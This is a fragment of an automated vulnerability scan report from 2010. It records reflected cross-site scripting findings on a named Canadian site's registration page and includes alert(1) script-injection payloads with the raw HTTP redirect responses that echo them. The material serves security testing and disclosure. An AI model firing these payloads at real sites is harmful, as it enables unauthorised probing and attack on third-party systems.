Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://www.plan.ca/registration/index.cfm?action=ForgetPasswordForm3c254"><script>alert(1)</script>2a8eaab5b62
Content-Length: 297
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.plan.ca/registration/index.cfm?action=ForgetPasswordForm3c254"><script>alert(1)</script>2a8eaab5b62">
...[SNIP]...
1.495. http://www.plan.ca/registration/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.plan.ca
Path: /registration/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 497b1"><script>alert(1)</script>4529f8791d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found
Date: Sat, 18 Dec 2010 23:26:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: https://www.plan.ca/registration/index.cfm?497b1"><script>alert(1)</script>4529f8791d4=1
Content-Length: 274
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.plan.ca/registration/index.cfm?497b1"><script>alert(1)</script>4529f8791d4=1">
...[SNIP]...
Report generated by XSS.CX at Sun Dec 19 07:08:47 CST 2010.